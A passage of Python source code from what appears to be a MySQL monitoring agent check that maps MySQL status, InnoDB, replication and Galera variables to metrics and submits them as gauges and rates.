# Table Cache Metrics
'Open_files': ('mysql.performance.open_files', GAUGE),
'Open_tables': ('mysql.performance.open_tables', GAUGE),
# Network Metrics
'Bytes_sent': ('mysql.performance.bytes_sent', RATE),
'Bytes_received': ('mysql.performance.bytes_received', RATE),
# Query Cache Metrics
'Qcache_hits': ('mysql.performance.qcache_hits', RATE),
'Qcache_inserts': ('mysql.performance.qcache_inserts', RATE),
'Qcache_lowmem_prunes': ('mysql.performance.qcache_lowmem_prunes', RATE),
# Table Lock Metrics
'Table_locks_waited': ('mysql.performance.table_locks_waited', GAUGE),
'Table_locks_waited_rate': ('mysql.performance.table_locks_waited.rate', RATE),
# Temporary Table Metrics
'Created_tmp_tables': ('mysql.performance.created_tmp_tables', RATE),
'Created_tmp_disk_tables': ('mysql.performance.created_tmp_disk_tables', RATE),
'Created_tmp_files': ('mysql.performance.created_tmp_files', RATE),
# Thread Metrics
'Threads_connected': ('mysql.performance.threads_connected', GAUGE),
'Threads_running': ('mysql.performance.threads_running', GAUGE),
# MyISAM Metrics
'Key_buffer_bytes_unflushed': ('mysql.myisam.key_buffer_bytes_unflushed', GAUGE),
'Key_buffer_bytes_used': ('mysql.myisam.key_buffer_bytes_used', GAUGE),
'Key_read_requests': ('mysql.myisam.key_read_requests', RATE),
'Key_reads': ('mysql.myisam.key_reads', RATE),
'Key_write_requests': ('mysql.myisam.key_write_requests', RATE),
'Key_writes': ('mysql.myisam.key_writes', RATE),
}
# Possibly from SHOW GLOBAL VARIABLES
VARIABLES_VARS = {
'Key_buffer_size': ('mysql.myisam.key_buffer_size', GAUGE),
'Key_cache_utilization': ('mysql.performance.key_cache_utilization', GAUGE),
'max_connections': ('mysql.net.max_connections_available', GAUGE),
'query_cache_size': ('mysql.performance.qcache_size', GAUGE),
'table_open_cache': ('mysql.performance.table_open_cache', GAUGE),
'thread_cache_size': ('mysql.performance.thread_cache_size', GAUGE)
}
INNODB_VARS = {
# InnoDB metrics
'Innodb_data_reads': ('mysql.innodb.data_reads', RATE),
'Innodb_data_writes': ('mysql.innodb.data_writes', RATE),
'Innodb_os_log_fsyncs': ('mysql.innodb.os_log_fsyncs', RATE),
'Innodb_mutex_spin_waits': ('mysql.innodb.mutex_spin_waits', RATE),
'Innodb_mutex_spin_rounds': ('mysql.innodb.mutex_spin_rounds', RATE),
'Innodb_mutex_os_waits': ('mysql.innodb.mutex_os_waits', RATE),
'Innodb_row_lock_waits': ('mysql.innodb.row_lock_waits', RATE),
'Innodb_row_lock_time': ('mysql.innodb.row_lock_time', RATE),
'Innodb_row_lock_current_waits': ('mysql.innodb.row_lock_current_waits', GAUGE),
'Innodb_current_row_locks': ('mysql.innodb.current_row_locks', GAUGE),
'Innodb_buffer_pool_bytes_dirty': ('mysql.innodb.buffer_pool_dirty', GAUGE),
'Innodb_buffer_pool_bytes_free': ('mysql.innodb.buffer_pool_free', GAUGE),
'Innodb_buffer_pool_bytes_used': ('mysql.innodb.buffer_pool_used', GAUGE),
'Innodb_buffer_pool_bytes_total': ('mysql.innodb.buffer_pool_total', GAUGE),
'Innodb_buffer_pool_read_requests': ('mysql.innodb.buffer_pool_read_requests', RATE),
'Innodb_buffer_pool_reads': ('mysql.innodb.buffer_pool_reads', RATE),
'Innodb_buffer_pool_pages_utilization': ('mysql.innodb.buffer_pool_utilization', GAUGE),
}
# Calculated from "SHOW MASTER LOGS;"
BINLOG_VARS = {
'Binlog_space_usage_bytes': ('mysql.binlog.disk_use', GAUGE),
}
# Additional Vars found in "SHOW STATUS;"
# Will collect if [FLAG NAME] is True
OPTIONAL_STATUS_VARS = {
'Binlog_cache_disk_use': ('mysql.binlog.cache_disk_use', GAUGE),
'Binlog_cache_use': ('mysql.binlog.cache_use', GAUGE),
'Handler_commit': ('mysql.performance.handler_commit', RATE),
'Handler_delete': ('mysql.performance.handler_delete', RATE),
'Handler_prepare': ('mysql.performance.handler_prepare', RATE),
'Handler_read_first': ('mysql.performance.handler_read_first', RATE),
'Handler_read_key': ('mysql.performance.handler_read_key', RATE),
'Handler_read_next': ('mysql.performance.handler_read_next', RATE),
'Handler_read_prev': ('mysql.performance.handler_read_prev', RATE),
'Handler_read_rnd': ('mysql.performance.handler_read_rnd', RATE),
'Handler_read_rnd_next': ('mysql.performance.handler_read_rnd_next', RATE),
'Handler_rollback': ('mysql.performance.handler_rollback', RATE),
'Handler_update': ('mysql.performance.handler_update', RATE),
'Handler_write': ('mysql.performance.handler_write', RATE),
'Opened_tables': ('mysql.performance.opened_tables', RATE),
'Qcache_total_blocks': ('mysql.performance.qcache_total_blocks', GAUGE),
'Qcache_free_blocks': ('mysql.performance.qcache_free_blocks', GAUGE),
'Qcache_free_memory': ('mysql.performance.qcache_free_memory', GAUGE),
'Qcache_not_cached': ('mysql.performance.qcache_not_cached', RATE),
'Qcache_queries_in_cache': ('mysql.performance.qcache_queries_in_cache', GAUGE),
'Select_full_join': ('mysql.performance.select_full_join', RATE),
'Select_full_range_join': ('mysql.performance.select_full_range_join', RATE),
'Select_range': ('mysql.performance.select_range', RATE),
'Select_range_check': ('mysql.performance.select_range_check', RATE),
'Select_scan': ('mysql.performance.select_scan', RATE),
'Sort_merge_passes': ('mysql.performance.sort_merge_passes', RATE),
'Sort_range': ('mysql.performance.sort_range', RATE),
'Sort_rows': ('mysql.performance.sort_rows', RATE),
'Sort_scan': ('mysql.performance.sort_scan', RATE),
'Table_locks_immediate': ('mysql.performance.table_locks_immediate', GAUGE),
'Table_locks_immediate_rate': ('mysql.performance.table_locks_immediate.rate', RATE),
'Threads_cached': ('mysql.performance.threads_cached', GAUGE),
'Threads_created': ('mysql.performance.threads_created', MONOTONIC)
}
# Status Vars added in Mysql 5.6.6
OPTIONAL_STATUS_VARS_5_6_6 = {
'Table_open_cache_hits': ('mysql.performance.table_cache_hits', RATE),
'Table_open_cache_misses': ('mysql.performance.table_cache_misses', RATE),
}
# Will collect if [extra_innodb_metrics] is True
OPTIONAL_INNODB_VARS = {
'Innodb_active_transactions': ('mysql.innodb.active_transactions', GAUGE),
'Innodb_buffer_pool_bytes_data': ('mysql.innodb.buffer_pool_data', GAUGE),
'Innodb_buffer_pool_pages_data': ('mysql.innodb.buffer_pool_pages_data', GAUGE),
'Innodb_buffer_pool_pages_dirty': ('mysql.innodb.buffer_pool_pages_dirty', GAUGE),
'Innodb_buffer_pool_pages_flushed': ('mysql.innodb.buffer_pool_pages_flushed', RATE),
'Innodb_buffer_pool_pages_free': ('mysql.innodb.buffer_pool_pages_free', GAUGE),
'Innodb_buffer_pool_pages_total': ('mysql.innodb.buffer_pool_pages_total', GAUGE),
'Innodb_buffer_pool_read_ahead': ('mysql.innodb.buffer_pool_read_ahead', RATE),
'Innodb_buffer_pool_read_ahead_evicted': ('mysql.innodb.buffer_pool_read_ahead_evicted', RATE),
'Innodb_buffer_pool_read_ahead_rnd': ('mysql.innodb.buffer_pool_read_ahead_rnd', GAUGE),
'Innodb_buffer_pool_wait_free': ('mysql.innodb.buffer_pool_wait_free', MONOTONIC),
'Innodb_buffer_pool_write_requests': ('mysql.innodb.buffer_pool_write_requests', RATE),
'Innodb_checkpoint_age': ('mysql.innodb.checkpoint_age', GAUGE),
'Innodb_current_transactions': ('mysql.innodb.current_transactions', GAUGE),
'Innodb_data_fsyncs': ('mysql.innodb.data_fsyncs', RATE),
'Innodb_data_pending_fsyncs': ('mysql.innodb.data_pending_fsyncs', GAUGE),
'Innodb_data_pending_reads': ('mysql.innodb.data_pending_reads', GAUGE),
'Innodb_data_pending_writes': ('mysql.innodb.data_pending_writes', GAUGE),
'Innodb_data_read': ('mysql.innodb.data_read', RATE),
'Innodb_data_written': ('mysql.innodb.data_written', RATE),
'Innodb_dblwr_pages_written': ('mysql.innodb.dblwr_pages_written', RATE),
'Innodb_dblwr_writes': ('mysql.innodb.dblwr_writes', RATE),
'Innodb_hash_index_cells_total': ('mysql.innodb.hash_index_cells_total', GAUGE),
'Innodb_hash_index_cells_used': ('mysql.innodb.hash_index_cells_used', GAUGE),
'Innodb_history_list_length': ('mysql.innodb.history_list_length', GAUGE),
'Innodb_ibuf_free_list': ('mysql.innodb.ibuf_free_list', GAUGE),
'Innodb_ibuf_merged': ('mysql.innodb.ibuf_merged', RATE),
'Innodb_ibuf_merged_delete_marks': ('mysql.innodb.ibuf_merged_delete_marks', RATE),
'Innodb_ibuf_merged_deletes': ('mysql.innodb.ibuf_merged_deletes', RATE),
'Innodb_ibuf_merged_inserts': ('mysql.innodb.ibuf_merged_inserts', RATE),
'Innodb_ibuf_merges': ('mysql.innodb.ibuf_merges', RATE),
'Innodb_ibuf_segment_size': ('mysql.innodb.ibuf_segment_size', GAUGE),
'Innodb_ibuf_size': ('mysql.innodb.ibuf_size', GAUGE),
'Innodb_lock_structs': ('mysql.innodb.lock_structs', RATE),
'Innodb_locked_tables': ('mysql.innodb.locked_tables', GAUGE),
'Innodb_locked_transactions': ('mysql.innodb.locked_transactions', GAUGE),
'Innodb_log_waits': ('mysql.innodb.log_waits', RATE),
'Innodb_log_write_requests': ('mysql.innodb.log_write_requests', RATE),
'Innodb_log_writes': ('mysql.innodb.log_writes', RATE),
'Innodb_lsn_current': ('mysql.innodb.lsn_current', RATE),
'Innodb_lsn_flushed': ('mysql.innodb.lsn_flushed', RATE),
'Innodb_lsn_last_checkpoint': ('mysql.innodb.lsn_last_checkpoint', RATE),
'Innodb_mem_adaptive_hash': ('mysql.innodb.mem_adaptive_hash', GAUGE),
'Innodb_mem_additional_pool': ('mysql.innodb.mem_additional_pool', GAUGE),
'Innodb_mem_dictionary': ('mysql.innodb.mem_dictionary', GAUGE),
'Innodb_mem_file_system': ('mysql.innodb.mem_file_system', GAUGE),
'Innodb_mem_lock_system': ('mysql.innodb.mem_lock_system', GAUGE),
'Innodb_mem_page_hash': ('mysql.innodb.mem_page_hash', GAUGE),
'Innodb_mem_recovery_system': ('mysql.innodb.mem_recovery_system', GAUGE),
'Innodb_mem_thread_hash': ('mysql.innodb.mem_thread_hash', GAUGE),
'Innodb_mem_total': ('mysql.innodb.mem_total', GAUGE),
'Innodb_os_file_fsyncs': ('mysql.innodb.os_file_fsyncs', RATE),
'Innodb_os_file_reads': ('mysql.innodb.os_file_reads', RATE),
'Innodb_os_file_writes': ('mysql.innodb.os_file_writes', RATE),
'Innodb_os_log_pending_fsyncs': ('mysql.innodb.os_log_pending_fsyncs', GAUGE),
'Innodb_os_log_pending_writes': ('mysql.innodb.os_log_pending_writes', GAUGE),
'Innodb_os_log_written': ('mysql.innodb.os_log_written', RATE),
'Innodb_pages_created': ('mysql.innodb.pages_created', RATE),
'Innodb_pages_read': ('mysql.innodb.pages_read', RATE),
'Innodb_pages_written': ('mysql.innodb.pages_written', RATE),
'Innodb_pending_aio_log_ios': ('mysql.innodb.pending_aio_log_ios', GAUGE),
'Innodb_pending_aio_sync_ios': ('mysql.innodb.pending_aio_sync_ios', GAUGE),
'Innodb_pending_buffer_pool_flushes': ('mysql.innodb.pending_buffer_pool_flushes', GAUGE),
'Innodb_pending_checkpoint_writes': ('mysql.innodb.pending_checkpoint_writes', GAUGE),
'Innodb_pending_ibuf_aio_reads': ('mysql.innodb.pending_ibuf_aio_reads', GAUGE),
'Innodb_pending_log_flushes': ('mysql.innodb.pending_log_flushes', GAUGE),
'Innodb_pending_log_writes': ('mysql.innodb.pending_log_writes', GAUGE),
'Innodb_pending_normal_aio_reads': ('mysql.innodb.pending_normal_aio_reads', GAUGE),
'Innodb_pending_normal_aio_writes': ('mysql.innodb.pending_normal_aio_writes', GAUGE),
'Innodb_queries_inside': ('mysql.innodb.queries_inside', GAUGE),
'Innodb_queries_queued': ('mysql.innodb.queries_queued', GAUGE),
'Innodb_read_views': ('mysql.innodb.read_views', GAUGE),
'Innodb_rows_deleted': ('mysql.innodb.rows_deleted', RATE),
'Innodb_rows_inserted': ('mysql.innodb.rows_inserted', RATE),
'Innodb_rows_read': ('mysql.innodb.rows_read', RATE),
'Innodb_rows_updated': ('mysql.innodb.rows_updated', RATE),
'Innodb_s_lock_os_waits': ('mysql.innodb.s_lock_os_waits', RATE),
'Innodb_s_lock_spin_rounds': ('mysql.innodb.s_lock_spin_rounds', RATE),
'Innodb_s_lock_spin_waits': ('mysql.innodb.s_lock_spin_waits', RATE),
'Innodb_semaphore_wait_time': ('mysql.innodb.semaphore_wait_time', GAUGE),
'Innodb_semaphore_waits': ('mysql.innodb.semaphore_waits', GAUGE),
'Innodb_tables_in_use': ('mysql.innodb.tables_in_use', GAUGE),
'Innodb_x_lock_os_waits': ('mysql.innodb.x_lock_os_waits', RATE),
'Innodb_x_lock_spin_rounds': ('mysql.innodb.x_lock_spin_rounds', RATE),
'Innodb_x_lock_spin_waits': ('mysql.innodb.x_lock_spin_waits', RATE),
}
GALERA_VARS = {
'wsrep_cluster_size': ('mysql.galera.wsrep_cluster_size', GAUGE),
'wsrep_local_recv_queue_avg': ('mysql.galera.wsrep_local_recv_queue_avg', GAUGE),
'wsrep_flow_control_paused': ('mysql.galera.wsrep_flow_control_paused', GAUGE),
'wsrep_cert_deps_distance': ('mysql.galera.wsrep_cert_deps_distance', GAUGE),
'wsrep_local_send_queue_avg': ('mysql.galera.wsrep_local_send_queue_avg', GAUGE),
}
PERFORMANCE_VARS = {
'query_run_time_avg': ('mysql.performance.query_run_time.avg', GAUGE),
'perf_digest_95th_percentile_avg_us': ('mysql.performance.digest_95th_percentile.avg_us', GAUGE),
}
SCHEMA_VARS = {
'information_schema_size': ('mysql.info.schema.size', GAUGE),
}
REPLICA_VARS = {
'Seconds_Behind_Master': ('mysql.replication.seconds_behind_master', GAUGE),
'Slaves_connected': ('mysql.replication.slaves_connected', GAUGE),
}
SYNTHETIC_VARS = {
'Qcache_utilization': ('mysql.performance.qcache.utilization', GAUGE),
'Qcache_instant_utilization': ('mysql.performance.qcache.utilization.instant', GAUGE),
}
class MySql(AgentCheck):
SERVICE_CHECK_NAME = 'mysql.can_connect'
SLAVE_SERVICE_CHECK_NAME = 'mysql.replication.slave_running'
DEFAULT_MAX_CUSTOM_QUERIES = 20
def __init__(self, name, init_config, agentConfig, instances=None):
AgentCheck.__init__(self, name, init_config, agentConfig, instances)
self.mysql_version = {}
self.qcache_stats = {}
@classmethod
def get_library_versions(cls):
return {'pymysql': pymysql.__version__}
def get_instance_key(self, instance):
return TopologyInstance("mysql", "mysql://mysql")
def check(self, instance):
host, port, user, password, mysql_sock, \
defaults_file, tags, options, queries, ssl, \
connect_timeout, max_custom_queries = \
self._get_config(instance)
self._set_qcache_stats()
if not (host and user) and not defaults_file:
raise Exception("Mysql host and user are needed.")
with self._connect(host, port, mysql_sock, user,
password, defaults_file, ssl, connect_timeout, tags) as db:
try:
# Metadata collection
self._collect_metadata(db)
# Metric collection
self._collect_metrics(db, tags, options, queries, max_custom_queries)
self._collect_system_metrics(host, db, tags)
# keeping track of these:
self._put_qcache_stats()
# Topology
self._collect_topology(host, db)
except Exception as e:
self.log.exception("error!")
raise e
def _get_config(self, instance):
self.host = instance.get('server', '')
self.port = int(instance.get('port', 0))
self.mysql_sock = instance.get('sock', '')
self.defaults_file = instance.get('defaults_file', '')
user = instance.get('user', '')
password = str(instance.get('pass', ''))
tags = instance.get('tags', [])
options = instance.get('options', {}) or {} # options could be None if empty in the YAML
queries = instance.get('queries', [])
ssl = instance.get('ssl', {})
connect_timeout = instance.get('connect_timeout', 10)
max_custom_queries = instance.get('max_custom_queries', self.DEFAULT_MAX_CUSTOM_QUERIES)
return (self.host, self.port, user, password, self.mysql_sock,
self.defaults_file, tags, options, queries, ssl, connect_timeout, max_custom_queries)
def _get_topology_hostname(self, host, port):
# Use the agent hostname for local host, otherwise use the remote hostname
return self.hostname if self._is_localhost(host, port) else host
def _collect_topology(self, host, db):
self.component(self._get_topology_hostname(host, db), "mysql", {})
def _set_qcache_stats(self):
host_key = self._get_host_key()
qcache_st = self.qcache_stats.get(host_key, (None, None, None))
self._qcache_hits = qcache_st[0]
self._qcache_inserts = qcache_st[1]
self._qcache_not_cached = qcache_st[2]
def _put_qcache_stats(self):
host_key = self._get_host_key()
self.qcache_stats[host_key] = (
self._qcache_hits,
self._qcache_inserts,
self._qcache_not_cached
)
def _get_host_key(self):
if self.defaults_file:
return self.defaults_file
hostkey = self.host
if self.mysql_sock:
hostkey = "{0}:{1}".format(hostkey, self.mysql_sock)
elif self.port:
hostkey = "{0}:{1}".format(hostkey, self.port)
return hostkey
@contextmanager
def _connect(self, host, port, mysql_sock, user, password, defaults_file, ssl, connect_timeout, tags):
self.service_check_tags = [
'server:%s' % (mysql_sock if mysql_sock != '' else host),
'port:%s' % ('unix_socket' if port == 0 else port)
]
if tags is not None:
self.service_check_tags.extend(tags)
db = None
try:
ssl = dict(ssl) if ssl else None
if defaults_file != '':
db = pymysql.connect(
read_default_file=defaults_file,
ssl=ssl,
connect_timeout=connect_timeout
)
elif mysql_sock != '':
self.service_check_tags = [
'server:{0}'.format(mysql_sock),
'port:unix_socket'
] + tags
db = pymysql.connect(
unix_socket=mysql_sock,
user=user,
passwd=password,
connect_timeout=connect_timeout
)
elif port:
db = pymysql.connect(
host=host,
port=port,
user=user,
passwd=password,
ssl=ssl,
connect_timeout=connect_timeout
)
else:
db = pymysql.connect(
host=host,
user=user,
passwd=password,
ssl=ssl,
connect_timeout=connect_timeout
)
self.log.debug("Connected to MySQL")
self.service_check_tags = list(set(self.service_check_tags))
self.service_check(self.SERVICE_CHECK_NAME, AgentCheck.OK,
tags=self.service_check_tags)
yield db
except Exception:
self.service_check(self.SERVICE_CHECK_NAME, AgentCheck.CRITICAL,
tags=self.service_check_tags)
raise
finally:
if db:
db.close()
def _collect_metrics(self, db, tags, options, queries, max_custom_queries):
# Get aggregate of all VARS we want to collect
metrics = STATUS_VARS
# collect results from db
results = self._get_stats_from_status(db)
results.update(self._get_stats_from_variables(db))
if not is_affirmative(options.get('disable_innodb_metrics', False)) and self._is_innodb_engine_enabled(db):
results.update(self._get_stats_from_innodb_status(db))
innodb_keys = [
'Innodb_page_size',
'Innodb_buffer_pool_pages_data',
'Innodb_buffer_pool_pages_dirty',
'Innodb_buffer_pool_pages_total',
'Innodb_buffer_pool_pages_free',
]
for inno_k in innodb_keys:
results[inno_k] = self._collect_scalar(inno_k, results)
try:
innodb_page_size = results['Innodb_page_size']
innodb_buffer_pool_pages_used = results['Innodb_buffer_pool_pages_total'] - \
results['Innodb_buffer_pool_pages_free']
if 'Innodb_buffer_pool_bytes_data' not in results:
results[
'Innodb_buffer_pool_bytes_data'] = results['Innodb_buffer_pool_pages_data'] * innodb_page_size
if 'Innodb_buffer_pool_bytes_dirty' not in results:
results[
'Innodb_buffer_pool_bytes_dirty'] = results['Innodb_buffer_pool_pages_dirty'] * innodb_page_size
if 'Innodb_buffer_pool_bytes_free' not in results:
results[
'Innodb_buffer_pool_bytes_free'] = results['Innodb_buffer_pool_pages_free'] * innodb_page_size
if 'Innodb_buffer_pool_bytes_total' not in results:
results[
'Innodb_buffer_pool_bytes_total'] = results['Innodb_buffer_pool_pages_total'] * innodb_page_size
if 'Innodb_buffer_pool_pages_utilization' not in results:
results['Innodb_buffer_pool_pages_utilization'] = innodb_buffer_pool_pages_used / \
results['Innodb_buffer_pool_pages_total']
if 'Innodb_buffer_pool_bytes_used' not in results:
results[
'Innodb_buffer_pool_bytes_used'] = innodb_buffer_pool_pages_used * innodb_page_size
except (KeyError, TypeError) as e:
self.log.error("Not all InnoDB buffer pool metrics are available, unable to compute: {0}".format(e))
if is_affirmative(options.get('extra_innodb_metrics', False)):
self.log.debug("Collecting Extra Innodb Metrics")
metrics.update(OPTIONAL_INNODB_VARS)
# Binary log statistics
if self._get_variable_enabled(results, 'log_bin'):
results[
'Binlog_space_usage_bytes'] = self._get_binary_log_stats(db)
# Compute key cache utilization metric
key_blocks_unused = self._collect_scalar('Key_blocks_unused', results)
key_cache_block_size = self._collect_scalar('key_cache_block_size', results)
key_buffer_size = self._collect_scalar('key_buffer_size', results)
results['Key_buffer_size'] = key_buffer_size
try:
# can be null if the unit is missing in the user config (4 instead of 4G for eg.)
if key_buffer_size != 0:
key_cache_utilization = 1 - ((key_blocks_unused * key_cache_block_size) / key_buffer_size)
results['Key_cache_utilization'] = key_cache_utilization
results['Key_buffer_bytes_used'] = self._collect_scalar(
'Key_blocks_used', results) * key_cache_block_size
results['Key_buffer_bytes_unflushed'] = self._collect_scalar(
'Key_blocks_not_flushed', results) * key_cache_block_size
except TypeError as e:
self.log.error("Not all Key metrics are available, unable to compute: {0}".format(e))
metrics.update(VARIABLES_VARS)
metrics.update(INNODB_VARS)
metrics.update(BINLOG_VARS)
if is_affirmative(options.get('extra_status_metrics', False)):
self.log.debug("Collecting Extra Status Metrics")
metrics.update(OPTIONAL_STATUS_VARS)
if self._version_compatible(db, (5, 6, 6)):
metrics.update(OPTIONAL_STATUS_VARS_5_6_6)
if is_affirmative(options.get('galera_cluster', False)):
# already in result-set after 'SHOW STATUS' just add vars to collect
self.log.debug("Collecting Galera Metrics.")
metrics.update(GALERA_VARS)
performance_schema_enabled = self._get_variable_enabled(results, 'performance_schema')
above_560 = self._version_compatible(db, (5, 6, 0))
if is_affirmative(options.get('extra_performance_metrics', False)) and above_560 and performance_schema_enabled:
# report avg query response time per schema to Datadog
results['perf_digest_95th_percentile_avg_us'] = self._get_query_exec_time_95th_us(db)
results['query_run_time_avg'] = self._query_exec_time_per_schema(db)
metrics.update(PERFORMANCE_VARS)
if is_affirmative(options.get('schema_size_metrics', False)):
# report avg query response time per schema to Datadog
results['information_schema_size'] = self._query_size_per_schema(db)
metrics.update(SCHEMA_VARS)
if is_affirmative(options.get('replication', False)):
# Get replica stats
is_mariadb = self._get_is_mariadb(db)
replication_channel = options.get('replication_channel')
if replication_channel:
self.service_check_tags.append("channel:{0}".format(replication_channel))
tags.append("channel:{0}".format(replication_channel))
results.update(self._get_replica_stats(db, is_mariadb, replication_channel))
nonblocking = is_affirmative(options.get('replication_non_blocking_status', False))
results.update(self._get_slave_status(db, above_560, nonblocking))
metrics.update(REPLICA_VARS)
# get slave running form global status page
slave_running_status = AgentCheck.UNKNOWN
slave_running = self._collect_string('Slave_running', results)
binlog_running = results.get('Binlog_enabled', False)
# slaves will only be collected iff user has PROCESS privileges.
slaves = self._collect_scalar('Slaves_connected', results)
slave_io_running = self._collect_type('Slave_IO_Running', results, dict)
slave_sql_running = self._collect_type('Slave_SQL_Running', results, dict)
if slave_io_running:
slave_io_running = any(v.lower().strip() == 'yes' for v in itervalues(slave_io_running))
if slave_sql_running:
slave_sql_running = any(v.lower().strip() == 'yes' for v in itervalues(slave_sql_running))
# MySQL 5.7.x might not have 'Slave_running'. See: https://bugs.mysql.com/bug.php?id=78544
# look at replica vars collected at the top of if-block
if self._version_compatible(db, (5, 7, 0)):
if not (slave_io_running is None and slave_sql_running is None):
if slave_io_running and slave_sql_running:
slave_running_status = AgentCheck.OK
elif not slave_io_running and not slave_sql_running:
slave_running_status = AgentCheck.CRITICAL
else:
# not everything is running smoothly
slave_running_status = AgentCheck.WARNING
elif slave_running.lower().strip() == 'off':
if not (slave_io_running is None and slave_sql_running is None):
if not slave_io_running and not slave_sql_running:
slave_running_status = AgentCheck.CRITICAL
# if we don't yet have a status - inspect
if slave_running_status == AgentCheck.UNKNOWN:
if self._is_master(slaves, results): # master
if slaves > 0 and binlog_running:
slave_running_status = AgentCheck.OK
else:
slave_running_status = AgentCheck.WARNING
elif slave_running: # slave (or standalone)
if slave_running.lower().strip() == 'on':
slave_running_status = AgentCheck.OK
else:
slave_running_status = AgentCheck.CRITICAL
# deprecated in favor of service_check("mysql.replication.slave_running")
self.gauge(self.SLAVE_SERVICE_CHECK_NAME, 1 if slave_running_status == AgentCheck.OK else 0, tags=tags)
self.service_check(self.SLAVE_SERVICE_CHECK_NAME, slave_running_status, tags=self.service_check_tags)
# "synthetic" metrics
metrics.update(SYNTHETIC_VARS)
self._compute_synthetic_results(results)
# remove uncomputed metrics
for k in SYNTHETIC_VARS:
if k not in results:
metrics.pop(k, None)
# add duped metrics - reporting some as both rate and gauge
dupes = [('Table_locks_waited', 'Table_locks_waited_rate'),
('Table_locks_immediate', 'Table_locks_immediate_rate')]
for src, dst in dupes:
if src in results:
results[dst] = results[src]
self._submit_metrics(metrics, results, tags)
# Collect custom query metrics
# Max of 20 queries allowed
if isinstance(queries, list):
for index, check in enumerate(queries[:max_custom_queries]):
total_tags = tags + check.get('tags', [])
self._collect_dict(check['type'],
{check['field']: check['metric']},
check['query'],
db,
tags=total_tags)
if len(queries) > max_custom_queries:
self.warning("Maximum number (%s) of custom queries reached. Skipping the rest."
% max_custom_queries)
def _is_master(self, slaves, results):
# master uuid only collected in slaves
master_host = self._collect_string('Master_Host', results)
if slaves > 0 or not master_host:
return True
return False
def _collect_metadata(self, db):
version = self._get_version(db)
self.service_metadata('version', ".".join(version))
def _submit_metrics(self, variables, db_results, tags):
for variable, metric in iteritems(variables):
metric_name, metric_type = metric
for tag, value in self._collect_all_scalars(variable, db_results):
metric_tags = list(tags)
if tag:
metric_tags.append(tag)
if value is not None:
if metric_type == RATE:
self.rate(metric_name, value, tags=metric_tags)
elif metric_type == GAUGE:
self.gauge(metric_name, value, tags=metric_tags)
elif metric_type == COUNT:
self.count(metric_name, value, tags=metric_tags)
elif metric_type == MONOTONIC:
self.monotonic_count(metric_name, value, tags=metric_tags)
def _version_compatible(self, db, compat_version):
# some patch version numbers contain letters (e.g. 5.0.51a)
# so let's be careful when we compute the version number
try:
mysql_version = self._get_version(db)
except Exception as e:
self.warning("Cannot compute mysql version, assuming it's older.: %s"
% str(e))
return False
self.log.debug("MySQL version %s" % mysql_version)
patchlevel = int(re.match(r"([0-9]+)", mysql_version[2]).group(1))
version = (int(mysql_version[0]), int(mysql_version[1]), patchlevel)
return version >= compat_version
def _get_version(self, db):
hostkey = self._get_host_key()
if hostkey in self.mysql_version:
version = self.mysql_version[hostkey]
return version
# Get MySQL version
with closing(db.cursor()) as cursor:
cursor.execute('SELECT VERSION()')
result = cursor.fetchone()
# Version might include a description e.g. 4.1.26-log.
# See
# http://dev.mysql.com/doc/refman/4.1/en/information-functions.html#function_version
version = result[0].split('-')
version = version[0].split('.')
self.mysql_version[hostkey] = version
return version
@classmethod
def _get_is_mariadb(cls, db):
with closing(db.cursor()) as cursor:
cursor.execute('SELECT VERSION() LIKE "%MariaDB%"')
result = cursor.fetchone()
return result[0] == 1
def _collect_all_scalars(self, key, dictionary):
if key not in dictionary or dictionary[key] is None:
yield None, None
elif isinstance(dictionary[key], dict):
for tag, _ in iteritems(dictionary[key]):
yield tag, self._collect_type(tag, dictionary[key], float)
else:
yield None, self._collect_type(key, dictionary, float)
def _collect_scalar(self, key, mapping):
return self._collect_type(key, mapping, float)
def _collect_string(self, key, mapping):
return self._collect_type(key, mapping, text_type)
def _collect_type(self, key, mapping, the_type):
self.log.debug("Collecting data with %s" % key)
if key not in mapping:
self.log.debug("%s returned None" % key)
return None
self.log.debug("Collecting done, value %s" % mapping[key])
return the_type(mapping[key])
def _collect_dict(self, metric_type, field_metric_map, query, db, tags):
"""
Query status and get a dictionary back.
Extract each field out of the dictionary
and stuff it in the corresponding metric.
query: show status...
field_metric_map: {"Seconds_behind_master": "mysqlSecondsBehindMaster"}
"""
try:
with closing(db.cursor()) as cursor:
cursor.execute(query)
result = cursor.fetchone()
if result is not None:
for field, metric in list(iteritems(field_metric_map)):
# Find the column name in the cursor description to identify the column index
# http://www.python.org/dev/peps/pep-0249/
# cursor.description is a tuple of (column_name, ..., ...)
try:
col_idx = [d[0].lower() for d in cursor.description].index(field.lower())
self.log.debug("Collecting metric: %s" % metric)
if result[col_idx] is not None:
self.log.debug(
"Collecting done, value %s" % result[col_idx])
if metric_type == GAUGE:
self.gauge(metric, float(result[col_idx]), tags=tags)
elif metric_type == RATE:
self.rate(metric, float(result[col_idx]), tags=tags)
else:
self.gauge(metric, float(result[col_idx]), tags=tags)
else:
self.log.debug(
"Received value is None for index %d" % col_idx)
except ValueError:
self.log.exception("Cannot find %s in the columns %s"
% (field, cursor.description))
except Exception:
self.warning("Error while running %s\n%s" %
(query, traceback.format_exc()))
self.log.exception("Error while running %s" % query)
def _is_localhost(self, host, port):
# The server needs to run locally, accessed by TCP or socket
return host in ["localhost", "127.0.0.1", "0.0.0.0"] or port == long(0)
def _collect_system_metrics(self, host, db, tags):
try:
pid = None
if self._is_localhost(host, db.port):
pid = self._get_server_pid(db)
if pid:
self.log.debug("System metrics for mysql w/ pid: %s" % pid)
# At last, get mysql cpu data out of psutil or procfs
ucpu, scpu = None, None
if PSUTIL_AVAILABLE:
proc = psutil.Process(pid)
ucpu = proc.cpu_times()[0]
scpu = proc.cpu_times()[1]
if ucpu and scpu:
self.rate("mysql.performance.user_time", ucpu, tags=tags)
# should really be system_time
self.rate("mysql.performance.kernel_time", scpu, tags=tags)
self.rate("mysql.performance.cpu_time", ucpu+scpu, tags=tags)
except Exception:
self.warning("Error while reading mysql (pid: %s) procfs data\n%s"
% (pid, traceback.format_exc()))
def _get_pid_file_variable(self, db):
"""
Get the `pid_file` variable
"""
pid_file = None
try:
with closing(db.cursor()) as cursor:
cursor.execute("SHOW VARIABLES LIKE 'pid_file'")
pid_file = cursor.fetchone()[1]
except Exception:
self.warning("Error while fetching pid_file variable of MySQL.")
return pid_file
def _get_server_pid(self, db):
pid = None
# Try to get pid from pid file, it can fail for permission reason
pid_file = self._get_pid_file_variable(db)
if pid_file is not None:
self.log.debug("pid file: %s" % str(pid_file))
try:
with open(pid_file, 'rb') as f:
pid = int(f.readline())
except IOError:
self.log.debug("Cannot read mysql pid file %s" % pid_file)
# If pid has not been found, read it from ps
